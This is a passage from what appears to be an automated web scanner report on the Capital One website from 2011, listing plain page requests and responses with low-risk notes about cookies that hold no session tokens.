GET /contactus/faq.php HTTP/1.1 Host: www.capitalone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:12:32 GMT Server: Apache Cache-Control: no-cache, no-store, must-revalidate Set-Cookie: caponesn=deleted; expires=Tue, 02-Feb-2010 22:12:32 GMT; path=/; domain=.capitalone.com Vary: Accept-Encoding,User-Agent P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV" Connection: close Content-Type: text/html; charset=ISO-8859-1 Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/ Content-Length: 21007
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Capital One Frequ ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /contactus/olbsupport.php HTTP/1.1 Host: www.capitalone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:12:34 GMT Server: Apache Cache-Control: no-cache, no-store, must-revalidate Set-Cookie: caponesb=c_m%3D2; expires=Thu, 02-Feb-2012 22:12:34 GMT; path=/; domain=.capitalone.com Vary: Accept-Encoding,User-Agent P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV" Connection: close Content-Type: text/html; charset=ISO-8859-1 Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/ Content-Length: 25849
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>Onlin ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /creditcards/ HTTP/1.1 Host: www.capitalone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:11:51 GMT Server: Apache Cache-Control: no-cache, no-store, must-revalidate Set-Cookie: caponecc=channel%3DUNS%2A20090715%3Atestgroup%3Dtg11%2A20110113; path=/; domain=.capitalone.com Set-Cookie: caponesn=f5b8a110S04syM9LTU6OK7YyMrNSCvULtjIyMLA0MDc01S1JNzTUNTIwNAQiYyXrOENTY3NjAA%3D%3D; expires=Wed, 01-Jan-2020 00:00:00 GMT; path=/; domain=.capitalone.com Set-Cookie: LP_GROUP=test; path=/creditcards/; domain=www.capitalone.com Vary: Accept-Encoding,User-Agent P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV" Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/ Content-Length: 31333
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US"> <h ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /creditcards/products/browse-all/ HTTP/1.1 Host: www.capitalone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:11:52 GMT Server: Apache Cache-Control: no-cache, no-store, must-revalidate Set-Cookie: caponehp=HP73%3ATC00%3Abm%3D7%2C15007; expires=Fri, 01-Jan-2010 00:00:00 GMT; path=/; domain=.capitalone.com Set-Cookie: caponecc=channel%3DUNS%2A20090715%3Atestgroup%3Dtg11%2A20110113; path=/; domain=.capitalone.com Set-Cookie: caponesn=f5b8a110S04syM9LTU6OK7YyMrNSCvULtjIyMLA0MDc01S1JNzTUNTIwNAQiYyXrOENTY3NjAA%3D%3D; expires=Wed, 01-Jan-2020 00:00:00 GMT; path=/; domain=.capitalone.com Set-Cookie: LP_GROUP=test; path=/creditcards/; domain=www.capitalone.com Vary: Accept-Encoding,User-Agent P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV" Connection: close Content-Type: text/html; charset=utf-8 Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/ Content-Length: 66271
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US"> <h ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /creditcards/products/browse-all/popular/ HTTP/1.1 Host: www.capitalone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:11:51 GMT Server: Apache Cache-Control: no-cache, no-store, must-revalidate Set-Cookie: caponehp=HP73%3ATC00%3Abm%3D7%2C15007; expires=Fri, 01-Jan-2010 00:00:00 GMT; path=/; domain=.capitalone.com Set-Cookie: caponecc=channel%3DUNS%2A20090715%3Atestgroup%3Dtg11%2A20110113; path=/; domain=.capitalone.com Set-Cookie: caponesn=f5b8a110S04syM9LTU6OK7YyMrNSCvULtjIyMLA0MDc01S1JNzTUNTIwNAQiYyXrOENTY3NjAA%3D%3D; expires=Wed, 01-Jan-2020 00:00:00 GMT; path=/; domain=.capitalone.com Set-Cookie: LP_GROUP=test; path=/creditcards/; domain=www.capitalone.com Vary: Accept-Encoding,User-Agent P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV" Connection: close Content-Type: text/html; charset=utf-8 Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/ Content-Length: 66647
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US"> <h ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /directbanking/ HTTP/1.1 Host: www.capitalone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:12:19 GMT Server: Apache Cache-Control: no-cache, no-store, must-revalidate Set-Cookie: caponehp=HP73%3ATC00%3Abm%3D9%2C15007; expires=Fri, 01-Jan-2010 00:00:00 GMT; path=/; domain=.capitalone.com Set-Cookie: coirule=deleted; expires=Tue, 02-Feb-2010 22:12:19 GMT; path=/; domain=.capitalone.com Set-Cookie: LP_GROUP=NDBCHAT_T_GRP; expires=Sun, 03-Apr-2011 21:12:20 GMT; path=/; domain=.capitalone.com Set-Cookie: caponesn=deleted; expires=Tue, 02-Feb-2010 22:12:19 GMT; path=/; domain=.capitalone.com Vary: Accept-Encoding,User-Agent P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV" Connection: close Content-Type: text/html; charset=utf-8 Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/ Content-Length: 37763
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US"> <h ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /directbanking/online-certificates-deposit/ HTTP/1.1 Host: www.capitalone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:12:13 GMT Server: Apache Cache-Control: no-cache, no-store, must-revalidate Set-Cookie: coirule=deleted; expires=Tue, 02-Feb-2010 22:12:12 GMT; path=/; domain=.capitalone.com Set-Cookie: LP_GROUP=NDBCHAT_T_GRP; expires=Sun, 03-Apr-2011 21:12:13 GMT; path=/; domain=.capitalone.com Set-Cookie: caponesn=deleted; expires=Tue, 02-Feb-2010 22:12:12 GMT; path=/; domain=.capitalone.com Vary: Accept-Encoding,User-Agent P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV" Connection: close Content-Type: text/html; charset=utf-8 Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/ Content-Length: 31412
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US"> <h ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /directbanking/online-checking-accounts/interest-online-checking-account/?linkid=WWW_1009_Z_A0B2084C1F86D22A0E1FFBF38F9G1F85H5AF4_HOME_C7_03_T_SP30&itc=CAPITALONE1112G1INTMKTGDF&number=HSRLutmi4O6tZPn79JErD HTTP/1.1 Host: www.capitalone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:12:17 GMT Server: Apache Cache-Control: no-cache, no-store, must-revalidate Set-Cookie: itc=CAPITALONE1112G1INTMKTGDF; expires=Sun, 03-Apr-2011 22:12:17 GMT; path=/; domain=.capitalone.com Set-Cookie: dbPhoneNumber=HSRLutmi4O6tZPn79JErD; path=/; domain=.capitalone.com Set-Cookie: coirule=deleted; expires=Tue, 02-Feb-2010 22:12:16 GMT; path=/; domain=.capitalone.com Set-Cookie: LP_GROUP=NDBCHAT_T_GRP; expires=Sun, 03-Apr-2011 21:12:17 GMT; path=/; domain=.capitalone.com Set-Cookie: caponesn=deleted; expires=Tue, 02-Feb-2010 22:12:17 GMT; path=/; domain=.capitalone.com Vary: Accept-Encoding,User-Agent P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV" Connection: close Content-Type: text/html; charset=utf-8 Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/ Content-Length: 10034
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US"> <h ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /directbanking/online-savings-accounts/ HTTP/1.1 Host: www.capitalone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:12:12 GMT Server: Apache Cache-Control: no-cache, no-store, must-revalidate Set-Cookie: coirule=deleted; expires=Tue, 02-Feb-2010 22:12:11 GMT; path=/; domain=.capitalone.com Set-Cookie: LP_GROUP=NDBCHAT_T_GRP; expires=Sun, 03-Apr-2011 21:12:12 GMT; path=/; domain=.capitalone.com Set-Cookie: caponesn=deleted; expires=Tue, 02-Feb-2010 22:12:11 GMT; path=/; domain=.capitalone.com Vary: Accept-Encoding,User-Agent P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV" Connection: close Content-Type: text/html; charset=utf-8 Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/ Content-Length: 32067
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US"> <h ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /directbanking/online-savings-accounts/high-yield-money-market-account/ HTTP/1.1 Host: www.capitalone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:12:08 GMT Server: Apache Cache-Control: no-cache, no-store, must-revalidate Set-Cookie: coirule=deleted; expires=Tue, 02-Feb-2010 22:12:07 GMT; path=/; domain=.capitalone.com Set-Cookie: LP_GROUP=NDBCHAT_T_GRP; expires=Sun, 03-Apr-2011 21:12:08 GMT; path=/; domain=.capitalone.com Set-Cookie: caponesn=deleted; expires=Tue, 02-Feb-2010 22:12:07 GMT; path=/; domain=.capitalone.com Vary: Accept-Encoding,User-Agent P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV" Connection: close Content-Type: text/html; charset=utf-8 Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/ Content-Length: 26985
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US"> <h ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /directbanking/online-savings-accounts/interestplus-online-savings-account/?linkid=WWW_1009_Z_A0B2084C1F86D22A0E1FFBF38F9G1F85H5AF4_HOME_C7_01_T_SP29&itc=CAPITALONE1112FYINTMKTGDF&number=HSRLutmi4O6tZPn79JErD HTTP/1.1 Host: www.capitalone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:12:07 GMT Server: Apache Cache-Control: no-cache, no-store, must-revalidate Set-Cookie: itc=CAPITALONE1112FYINTMKTGDF; expires=Sun, 03-Apr-2011 22:12:07 GMT; path=/; domain=.capitalone.com Set-Cookie: dbPhoneNumber=HSRLutmi4O6tZPn79JErD; path=/; domain=.capitalone.com Set-Cookie: coirule=deleted; expires=Tue, 02-Feb-2010 22:12:06 GMT; path=/; domain=.capitalone.com Set-Cookie: LP_GROUP=NDBCHAT_T_GRP; expires=Sun, 03-Apr-2011 21:12:07 GMT; path=/; domain=.capitalone.com Set-Cookie: caponesn=deleted; expires=Tue, 02-Feb-2010 22:12:06 GMT; path=/; domain=.capitalone.com Vary: Accept-Encoding,User-Agent P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV" Connection: close Content-Type: text/html; charset=utf-8 Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/ Content-Length: 29344
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US"> < ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /directbanking/online-savings-accounts/rewards-money-market-account/index.php?linkid=WWW_1009_Z_A0B2084C1F86D22A0E1FFBF38F9G1F85H5AF4_HOME_C7_05_T_DBREWMMA&itc=CAPITALONE1112G1INTMKTGDF&number=HSRLutmi4O6tZPn79JErD HTTP/1.1 Host: www.capitalone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:12:13 GMT Server: Apache Cache-Control: no-cache, no-store, must-revalidate Set-Cookie: itc=CAPITALONE1112G1INTMKTGDF; expires=Sun, 03-Apr-2011 22:12:13 GMT; path=/; domain=.capitalone.com Set-Cookie: dbPhoneNumber=HSRLutmi4O6tZPn79JErD; path=/; domain=.capitalone.com Set-Cookie: coirule=deleted; expires=Tue, 02-Feb-2010 22:12:12 GMT; path=/; domain=.capitalone.com Set-Cookie: LP_GROUP=NDBCHAT_T_GRP; expires=Sun, 03-Apr-2011 21:12:13 GMT; path=/; domain=.capitalone.com Set-Cookie: caponesn=deleted; expires=Tue, 02-Feb-2010 22:12:12 GMT; path=/; domain=.capitalone.com Vary: Accept-Encoding,User-Agent P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV" Connection: close Content-Type: text/html; charset=utf-8 Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/ Content-Length: 31377
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US"> < ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /financialeducation/?linkid=WWW_1009_Z_A0B2084C1F86D22A0E1FFBF38F9G1F85H5AF4_GBLFO_F1_06_T_FIN HTTP/1.1 Host: www.capitalone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:12:40 GMT Server: Apache Cache-Control: no-cache, no-store, must-revalidate Set-Cookie: caponesb=c_m%3D4; expires=Thu, 02-Feb-2012 22:12:40 GMT; path=/; domain=.capitalone.com Vary: Accept-Encoding,User-Agent P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV" Connection: close Content-Type: text/html; charset=ISO-8859-1 Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/ Content-Length: 27487
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>Finan ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /financialeducation/creditcardact/index.php HTTP/1.1 Host: www.capitalone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:12:39 GMT Server: Apache Cache-Control: no-cache, no-store, must-revalidate Set-Cookie: caponesb=c_m%3D2; expires=Thu, 02-Feb-2012 22:12:39 GMT; path=/; domain=.capitalone.com Vary: Accept-Encoding,User-Agent P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV" Connection: close Content-Type: text/html; charset=ISO-8859-1 Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/ Content-Length: 24653
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>Credi ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /fraud/prevention/index.php HTTP/1.1 Host: www.capitalone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;
Response
